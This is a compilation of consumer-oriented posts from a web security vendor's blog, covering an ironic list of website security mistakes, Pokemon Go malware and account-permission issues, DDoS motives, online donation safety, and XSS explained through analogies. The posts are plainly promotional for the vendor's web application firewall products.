Boy Programming On Computer With Multiple Monitors And Laptop On Desk

7 Ways to Expose Your Website to Hackers

So you want to serve up your website for any hacker to break into. Sure, weirdo…who am I to judge?

Here are 7 things you should not do unless you want your website hacked:

Once again, if you’re a sensible human being you really should never find yourself doing any of these things.

1. Ignore Security Updates

They may be a nuisance, but updates patch up newly discovered bugs in software. Not installing updates and patches makes it a lot easier for hackers to compromise your device or web app. If you want your website hacked, ignore all security patches, plugin updates, and updates for CMS services such as WordPress or Drupal.

2. Use as Many Different Features and Plugins On Your Site As Possible

Plugins introduce many new potential vulnerabilities to your website, similar to how adding more windows makes your submarine less seaworthy. Be sure to load up on file uploaders, video players, ad managers, analytics, and whatever else you can cram in, even if you don’t need any of it.

3. Set a Really Dumb Password

Setting your password as something easy like “123456,” the always-clever “password,” or matching your password to your username saves hackers a lot of time. You can also help by using the same password for your computer, e-mail, FTP access, and Ashley Madison account, so that once one is compromised, all of them exposed.

setting a password to protect website security

4. Mismanage Your Website and Its Contributors

Just let security be someone else’s job, and don’t take any notice. Be sure to give your employees or contributors full admin access to your website, and make sure not to update your passwords after they leave. Sooner or later, something bad will happen.

5. Don’t Put Together a Security Incident Response Plan

No need to prepare for the worst when you’re counting on it. What if your site gets disabled, or deleted, or information is leaked? How do you detect it, how do you respond, and how do you disclose it? Those are questions that should be considered by anyone who doesn’t want to get hacked.

6. Don’t Bother Securing Your Domain With SSL

SSL encrypts communication between a website’s server and a user’s browser, especially useful in protecting online transactions and payments. But it thwarts man-in-the-middle attacks in which a hacker gets between server and browser and can monitor or alter communication. So if you want to endanger your customers’ privacy, forget about HTTPS — HTTP is the way to go!

7. Don’t Use a Web Application Firewall

A web application firewall can protect your site against the worst online threats, including DDoS attack, SQL injection, and cross-site scripting (XSS), so if you want to make it easier for hackers to overrun your website, the last thing you should do is secure it with a web app firewall like Cloudbric, Imperva, or Cloudflare.


 

This blog post was originally featured on cloudbric.com. Visit their blog for more insight, news, and accessible information on web threats and trends. If you would like to learn more about Cloudbric’s logic-based WAF service, please contact info@cloudbric.com.

profile

Why Hack Pokemon Go? The Saga Continues…

When Pokemon Go launched a few weeks ago, I thought back to my childhood days of watching the show. But little did I know that I would end up this worried about the cyber security issues regarding the game. A couple of weeks ago, I wrote a post regarding the authorization issues of the game, which largely had to do with the iOS devices attempting to download and authenticate the Google accounts. This week I want to follow up on this phenomenon, especially as it looks like releases in other parts of the world have been happening or look to be imminent.

Pokemon Go, a Hacker’s Paradise

Because the game didn’t have a global release but a limited one (to the USA and ANZ), there were fans around the world itching to get their hands on the game. Hence, third-party apps (which are unverified and should be avoided) and mirrored apps began to appear. Third party applications are not developed by the original developer, but developed by other companies (most of the time for opportunities where they can make some profit or gain recognition). Mirrored or cloned applications are those that may resemble the original but most often are ploys for infecting malware onto a device.

While mirrored applications are caught fairly quickly because of security measures, eager users were quicker to get to them than security managers. Sure enough, it was found that for Android users, many versions of the repackaged Pokemon Go games were infected with malware. This could hand over sensitive data to a hacker or even take control of the entire device. For example, a malware called Droidjack is a remote access tool executed on Android devices which allows for access into infected devices.

What’s the Response?

pokemon go guidelines in japan

credits to NISC

The organizational responses differed greatly. On one hand, Japan responded in an open manner where last week, NISC (National Center of Incident Readiness and Strategy for Cybersecurity) sent out a friendly infographic. Through 9 steps, it reminded people of the guidelines one should follow when playing the game. We won’t go into the translation of all the guidelines, but in particular, #1 (identity issues) and #2 (double checking for third party applications) have to do with cyber security measures.

On the other hand, countries like Malaysia are wondering if barring the game entirely might be a safer method. Last week, a referendum was called for by a well-known journalist from the New Strait Times to keep the game from entering the country. The journalist stated that it was a national concern in terms of the military as well as society as a whole. There are others who have said that the game goes against Islamic religion and could be offensive to the culture.

It’s safe to say that this trend should not be ignored if governments are starting to become involved.

So What’s a Gamer to Do?

Realistically, we’ll continue to see news headlines about the next incident regarding this game. Within cyber security, hackers will continue to target the apps and the users for two reasons. The most obvious answer is that of profit – with a cloned app, hackers can take advantage of eager users and reap financial benefits. The second not-so-obvious reason is that sometimes hackers do it for an adrenaline rush. With a big trend like this where every other headline is about the game, they want their piece of the fame and the recognition. This adrenaline-seeking does not look like it will stop anytime soon. That’s why it’s the responsibility of the user to be careful.

Some might tell you to stop playing. Go get some fresh air. However, let’s not forget that this is a major phenomenon of a game. Literally everyone and their mother is playing it. So what are some realistic things you can do?

Here are my top three tips:

  1. Stay away from third-application software. Niantic will bring it to your country soon enough – in fact, the game was released in Germany and Japan last week, and it’s now available in over 30 countries.
  2. Still take into account authorization issue. As the game becomes more and more popular, more hackers will be targeting Niantic’s databases. Go into Google’s security page and look for the application to see what you are authorizing.
  3. Consider a security solution for your mobile device. Look for one that will detect malware-infected versions of applications so that you’re preventing infections. It’s really no use trying to remedy them after your device has already been infected. If you’re in Korea, you might consider D’Amo, Penta Security’s encryption solution. With a component made for smartphones in the PKI line, it can protect the data that is in your device.

So let’s have a discussion. What is the current viewpoint of Pokemon Go in your country among the general population? What is your governmental organization doing regarding the potential (physical and cyber) security issues? What are you doing regarding Pokemon Go? 

ddos attack net of thieves over a computer desk

DDoS Top 6: Why Hackers Attack

Lately, it seems like the companies that haven’t had their web and cyber security compromised are in the minority.

Many are hit hard by web vulnerability attacks. Specifically we see an increase in DDoS (Distributed Denial of Service) attacks. With DDoS, the attacker’s main goal is to make your website inaccessible using botnets. Botnets are basically an army of connected devices that are infected with malware. Your website’s server becomes overloaded and exhausted of its available bandwidth because of this army. Much of the time, the attack doesn’t usually even breach your data or go over any security parameters.

So if it’s not to breach your data, why would someone go through the effort to shut down your website? There are a multitude of reasons, but today we’ll look at the top 6 reasons for a Distributed Denial of Service Attack.

1. Some (not-so) friendly competition

As more and more enterprises are taking their storefronts to the cyber world – there is also competition within the cyber world.

In fact, in a recent survey nearly half the responding businesses said that they believed that their competitors were launching DDoS attacks in order to disrupt services. After all, if your competition’s website is down, all the traffic will come to your website instead. Additionally, your competition’s brand image is tarnished, giving positive associations to your company instead.

Even if an entrepreneur may not be skilled in hacking, DDoS attacks are now available for hire, and attacks can be executed for a fairly low price on the dark market.

2. DDoS for Hacktivism

As we’ve noted, DDoS attacks aren’t necessarily about taking data. It can be used to strongly voice an opinion – any opinion. Voicing your opinion on the Web can have a bigger and faster effect than if you were to attend an in-person rally or strike. DDoS is often used to show support or opposition regarding a certain topic. It could be political (see below), but also for/against businesses or banks, ethical concerns, or even an online game.

3. All about politics

A subset of reason #2, DDoS attacks can also happen between countries or governments. The Web is the newest battlefield. DDoS attack victims can be government websites. While the sites could have been attacked by apolitical hackers, many do believe that governments or political parties often attack each other using the DDoS method.

As most governments rely on the Web to communicate and run their country, this has proven to be an effective method to show political opposition.

4. Seeking their revenge

An extremely common reason for DDoS attacks, this situation could apply to businesses, individuals, as well as governments. Not necessarily to give an opinion, attacks are used to seek revenge on your enemy. There’s no need to get your hands dirty at all.

For example, there have been increasing instances of previous employees hiring DDoS attacks on the dark market to seek revenge on their former employers. We’ve previously written on internal data breaches by present or past employees, but this is yet another form of when one person holds a grudge and it affects an entire company.

5. A precursor for something bigger

On New Year’s Eve of 2015, BBC was reportedly attacked with a DDoS attack measuring over 600 Gbps, beating out the previously set record of 334 Gbps. The attackers who claimed responsibility, New World Hacking, said that it was simply “testing.” More recently, the hacking group PoodleCorp took responsibility for shutting down the trending Pokemon Go game using the DDoS attack and they claimed that they were also testing for something on a larger scale.

A hacker may be preparing for something new like the above two cases, or they may be using the attack as a distraction for a larger attack, hoping that they won’t be found out. This is one case where the attack may be used indirectly for a security breach.

6.Some plain ol’ fun?

And lastly, sometimes there’s really no rhyme or reason to why DoS or DDoS attacks happen.

There’s a misconception that there is a specific reason behind all attacks. However, this is simply not the case. Many hackers get an adrenaline rush from hacking into a system or a website, no matter how big or how small it may be.


Therefore, there’s the responsibility as the individual user or as the CIO/CTO of a company to ensure that security measures are being taken. One needs to prepare for an attack because no one is ever exempt from the chances of an attack.

So what are these security measures I speak of? In my opinion, the most essential step you can take is to protect yourself with a WAF (Web Application Firewall). By using WAF services like Cloudbric or a WAF like WAPPLES, you can make sure your website is continuously protected.

For more information on Cloudbric (full service website security provided for free if your website’s bandwidth is under 4GB/month), check out their website and find out more about WAPPLES, the WAF they use for their service.

pokemon go and pikachu dolls

Authorization, Authentication, and Pokemon-Go

When I opened up my news feed last week, 80% of the updates and news headlines were about the phenomenon that is Pokémon-Go.

For those of you that have no idea what this is, Pokemon-Go is a game that was started by a Google internal startup called Niantic. Within the game you can use AR (augmented reality) to catch, battle, and train Pokémon (fictional animals, or “pocket monsters”) throughout the real world.

The game has millions of users on both Android and iOS devices, and the numbers will continue to increase. This isn’t surprising as much of the millennial population grew up watching the cartoon, playing the video game, and collecting the merchandise like there was no tomorrow.

Despite the excitement of it all, unfortunately, some issues have come up as there have been muggings by criminals at popular game meetup locations and trespassing at memorial sites like the Holocaust museum. Furthermore, the story has taken a new turn as it has now stepped into the realm of cyber security.

The Authorization Problem

The (potentially catastrophic) problem of this game is regarding Authorization and Authentication. These two concepts are often mixed up, but let’s explore them a bit within the context of the game itself.

Authentication verifies who you are – that you’re not a robot trying to access the game. In order to do this, the game application requires you to authorize Niantic to access your information. Authorization happens just once, but that one-time authorization determines how much information you’re granting the application.

So the problem for this game ultimately lies in the authorization. You can authenticate your account via two ways within the application: through a pokemon.com account or through your Google account. Then normally, Google would show the level of permissions the application requires. However, before July 12, when authenticating through your Google account, when you clicked the button it automatically switched to the log-in screen meaning full permissions was handed over automatically – that means that all of your information related to the Google account were handed over to Niantic.

“Well, I’m just going to play the game. So it should be ok.”

But this kind of mindset is why it’s so dangerous to buy into the trend. The reality is, because this is your Google account, your account may contain payment information, your address, and your passwords. Millions have signed off their information to the application, and thus the database is now becoming a prime target for hackers.

Did Niantic mean for this to happen? Probably not – it was an oversight, and the error was corrected on July 12. Now, the application requires limited permissions, so that it will only maintain your basic information. If download the application now, you get this:

pokemongo-release

But the game isn’t over, because when there is data of any kind (even if it’s limited), there is value. The game is at 10 million accounts now, and experts say that when they hit 20-25 million records there is no doubt that there will be a data breach.

So, Pokemon Go or No?

Realistically, people will continue to play the game, and it’s likely to make its way into other parts of the world. What can you as the player/user do to protect your information?

First, be aware of the authorization you’re granting applications when following this kind of phenomenon. When an application first comes onto the scene, there’s a lot that can go wrong. It may have vulnerabilities that have yet to be discovered, and malware-infected versions that have been released.

Second, ask for transparency as the user. Any company, especially one that requires so much of your information, should openly state what security measures it is taking. As stated before, Niantic probably didn’t mean for this to happen. However, as AR and VR (virtual reality) are becoming increasingly prevalent within technology, more and more companies may inadvertently or intentionally seek higher levels of permissions in order to access your information. However, when society as a whole demands transparency, this can be mitigated to a significant degree.

Lastly and perhaps most importantly, stay safe in real life. Augmented reality, virtual reality – none of it matters if you’re not aware in physical reality of what’s going on.


Visit www.pentasecurity.com for more information on other web and data security products, news, and blog posts.

credit-card-1591492_640

Think Twice Before Donating Online

Donating Online From a Security Perspective

Have you ever made a donation? It’s a good feeling to have when we try to help somebody out. Based on the National Philanthropic Trust Organization’s data, Americans gave $358.38 billion in 2014, and it continues to increase yearly. We usually donate physically in a store, school, or at work, but the internet has made people’s donating online a lot easier. However, we should take some precautions before we make these donations.

Although not as large as Kickstarter.com or GoFundMe.com, it’s pretty simple to make a website to receive funding. Communities can create a website to donate to schools. Families can make a site to receive donations to pay for the funeral costs for the death of a loved one. With a giving heart, we usually donate a few bucks to help them out. But, we really should think twice before donating online.

According to Bloomberg, Bank of America spent over $400 million in 2014 to protect their online customers. Large corporations have their own security team to protect their websites, but what about the smaller companies that help people? Clearly, a school does not have $400 million to protect their donation website from web attacks. A person asking for money is not likely to put money into security for their website.

donating online

Although donating online can be a simple and efficient way to help somebody out, it has some negative consequences if it is done negligently. Would you give your wallet full of cash to a bank that’s not protected? Donating money to an unprotected website can not only take away your money, but your personal information can be leaked as well. Your personal information like your name, address, and phone number, but also your credit card information and bank account information can all be consequentially leaked.

I’m not saying do not donate online completely. Donation websites are for a good cause. If you really want to donate for a certain cause, there are safety measures you can take to avoid any dangers.

1. Make Sure It Is a Trusted Organization or a Someone You Know Personally

There are many fraudulent donation campaigns to make a quick profit and run, so make sure it is genuine. Verify their address or phone number if it looks suspicious.

2. Check the URL Box and See If It Says “https”

The extra ‘s’ stands for ‘secure,’ and when you deal with money or personal information, it should always be secure. Another tip is to check if there is a “lock” icon on your browser. This lock can be located next to the URL. By clicking it, you will get more information about the security of that webpage. An advantage for Google Chrome users is that the locks have different colors. A green lock means that it has an EV certificate which can be quite expensive but well-secured, while a red lock may show that it may have failed some verification process.

3. Send a Message to the Website Administrator

Ask if the website is secured with a web application firewall. Website protection solutions like Cloudbric provide comprehensive website protection for free up to 4GB traffic usage, which makes it more than enough for donation sites to be fully protected without paying a penny.

All of these methods should be checked before you type in your credit card number. It’s always great to give, but make sure you are protecting your wallet as well.

This blog post was originally featured on cloudbric.com. Visit their blog for more insight, news, and accessible information on web threats and trends. If you would like to learn more about Cloudbric’s logic-based WAF service, please contact info@cloudbric.com.

ddos attack net of thieves over a computer desk

XSS: The Con-Artist

“XSS” is an acronym you hear often in the field of information security. It’s a relatively common attack for both the client and the server. Acronyms can make you think that it’s a bit more hi-tech and complicated than it really is. But at the root of it, XSS is basically a con-artist, waiting for his next ploy.

What is XSS?

Short for Cross Site Scripting, this web vulnerability is a type of injection where the attacker inserts script (oftentimes JavaScript) into a page. The script is not sanitized and allowed to remain in the browser – meaning the script can execute as if the administrator had written it.

There could be a variety of consequences: It could alter the display, modify the browser, or even steal your session cookie and sign in as an administrator, which could give complete control over to a hacker.

But I use the word “could” because there’s a lot of variety and uncertainty when it comes to the XSS vulnerability: what the consequences can be, when they can happen, and to what extent they reach. So let’s make it a bit easier to process.

Think of the XSS vulnerability as a con artist’s latest trick. You never go out looking for a con-artist, but some way or another, they get you right where they want you.

Non-Persistent XSS: the Pickpocket Scam

Pickpocketing is the oldest trick in the book, proven to work time and time again. It’s become a common and simple way for attackers to get their target. The pickpocket may approach you as the “nice stranger” who’s asking for directions on the street. But their hand reaches to take your wallet from your pocket while you’re explaining directions. Though the pickpocket targeted you, when the ordeal is done and your money is gone, it’s as if it never happened.

non-persistent xss chart

It’s the same with Non-Persistent XSS, the most common type of XSS. An attacker will inject script that’s targeted and contains malicious script. You click it, and fall for the trap. But just like with a pickpocket, when the code is injected and you have been fooled, none of what happened goes to the server. The website will simply execute the script and reflect it back to your browser, and the cookies will go to the attacker. Immediacy and the lack of detectability are the highlights of these non-persistent XSS attacks.

Persistent XSS: The ATM Skimmer

On the other side, Persistent XSS is much less common. While it has the potential of causing more significant damage, it can also be found out and remedied quicker. Think of an ATM skimmer. A skimmer is an electronic device that is placed within or outside an ATM. It takes the information that a customer may put into the ATM. The difference? While the skimmer may look the same as the ATM that the customer uses on a daily basis, it is copying all information and relaying it to the con-artist. It’s non-targeted, so everyone who uses the ATM will be affected without discrimination.

Like the ATM skimmer, the website may look the same as it usually does after the malicious script has been injected. It is saved by the server and then displayed on normal pages. All users who are browsing the website will be subject to the XSS. It will be affected over and over again.  In fact, this is why this type of XSS vulnerability is much more dangerous. Damage can be done to a wider breadth of users without anyone knowing that there is anything amiss.
PERSISTENT xss

Fortunately, because this type of XSS takes place on a server – if someone is able to spot the unwelcome script, it can be remedied. In the case of the skimmer, perhaps the ATM maintenance crew notices that there is a bar code missing, or a warranty seal that’s in the wrong place. They can take quick and urgent steps to make sure that the skimmer is removed.

XSS Exploits in Real Life

XSS-affected websites can suffer from a variety of issues. Unfortunately, websites with a large number of active users are often affected through both persistent and non-persistent XSS. Recently, a Persistent XSS vulnerability was found on PayPal’s website. This would have allowed for hackers to inject code resulting in a malicious payload, potentially opening up attacks for its 150 million customers. Thankfully, the company was notified of the vulnerability before any negative impact. But of course, there are companies that aren’t so lucky.

Hackers will always find popular websites, big or small, to execute their attacks, so what can you do to protect your website?

  • Source Code Analysis: Source code analysis tools are used to find security flaws by going through source code line by line. Ideally, this tool will be used before the website goes live. This way, problems can be re-mediated before any issues arise.
  • Vulnerability Scanners: There are security scanners that will identify vulnerabilities like XSS. Although they’re not perfect (because they’re not optimized for your website or application specifically), they can allow you to find the most obvious vulnerabilities to clean up.
  • Web Application Firewall: Web Application Firewalls or WAFs follow rule-sets to detect or block anything suspicious. WAFs will normally prevent attacks such as XSS and SQLi as part of their rule-set. Make sure that your WAF is one that has low false positive rates. That’s it! You’re well on your way to having a safer, cleaner website.

Which method is the most effective? As I always say, there’s no perfect way to escape any form of web attack. But the best thing you can do is follow the points above like a process. Source code analysis tools will scan for flaws before anything goes live. Vulnerability scanners will then look for further issues as the website is up. A WAF will block the attempts that manage to slip through the cracks. Unfortunately, nothing is foolproof. But risk can always be reduced and controlled.

office-96107_1920

“Website” Meaning for Startup CEOs?

You might hear a lot of CEOs saying, “My website is powered by WordPress”, “My website is everything”, or “My website is my entire business!” These are the most common answers from CEOs. Almost all startups operate their own websites. Many startup CEOs build their websites with CMS tools such as WordPress, Joomla, or Drupal. Those that depend on these tools really need to pay attention to what these are, if they have any hope to do business online.

Well, the actual definition of a website is a connected group of pages on the Internet that use unique addresses and network routes, which are based on Internet protocols. But who can actually understand this kind of explanation? A website is web data, with web pages and contents. To get a better understanding of what a website really is, we can start by knowing more about CMS. A ‘web content management system,’ CMS is a tool that processes many raw contents into useful resources in this content-filled world. This is the leading solution to building a website without any difficulties. Methods of protecting a website can differ completely depending on the beliefs of the startup CEO. One CEO may want to protect a site one way, and another CEO may think differently and protect a site another way. It all depends on their definition of what a website is to them. Here is a closer look at common assumptions CEOs have about websites.

1. ‘My website is powered by CMS’

CMS and all related plugin modules are website building and operating tools. Building security with an application can be done by secure coding. However, secure coding may not be perfect. That’s why CMS services release security patches and updates. Users need to constantly update. Still, a website can get ‘zero-day attacks,’ that brief period of vulnerability when the hacker can attack before the CMS vendor finds out.

The point here is that, not limited to CMS services themselves, users also need to pay attention and double-check every module to see whether it is really safe or not. Modules should only be downloaded from reliable, trustworthy websites. It can be quite bothersome to constantly update and still be vulnerable to attacks.

startup ceos think that CMS protect thier websites

2. ‘My website is all the data stored in the data center’

Technically, this is a pretty close answer. A website is data, and website data is stored at an Internet data center, IDC for short. To keep data safe, the data center administrator manages an application firewall and network security tools such as IDS/IPS to prevent hackers, viruses, and malicious codes from entering the data center.

Enterprises can usually afford to directly manage their own web server in the data center. But most startups can’t do this, so they rely on their hosting services to manage it for them with a lease of a partial web server in the data center. Cloud hosting services are popular among both small and medium businesses and larger enterprises. But if users use a cloud hosting service such as AWS, there is nothing the user can do about data center security. The data center will probably be safe, but the security is built around the server, and not the individual websites.

3. ‘My website is my own private data with web pages’

This is how startup CEOs should perceive their website. Understanding this concept is important because among security attacks on information, 90% of attacks are aimed at contents, through contents. Compared to the vulnerability of CMS and physical data storage, content vulnerability is a more serious matter. Website attacks are directed at the contents of a website. The contents are not necessarily images or files, but may include account information and administrative authority.

So, how can startup CEOs with CMS protect their websites?

Websites to a business can take on a completely different meaning from the average user. Startup CEOs might view a website as their gateway to the outside world. It is their vehicle to communicate their business and sell products. In essence, a website is a business. Most websites are powered by CMS systems and since there’s no way to know how secure CMS apps have been coded, they just need to constantly update the security patches provided by CMS to avoid attacks like SQL injections. Still not completely safe, CEOs need a web application firewall that covers all the vulnerabilities of CMS’s own security measures.

Even if a cloud-hosting service protects the web server or its data center, it does not protect the contents of individual websites. Basically, the data center manages the antivirus role and the network security role, but it does not take the web contents security role. Technical and privacy issues restrict it from securing web content.

A web application firewall (WAF), on the other hand, can fully protect website content. The cloud-based web application firewall Cloudbric can protect your website. Even if your data is stored safely on an IDC, or if you update security patches constantly on CMS, you still need a WAF to fully protect your website.


This blog post was originally featured on cloudbric.com. Visit their blog for more insight, news, and accessible information on web threats and trends. If you would like to learn more about Cloudbric’s logic-based WAF service, please contact info@cloudbric.com.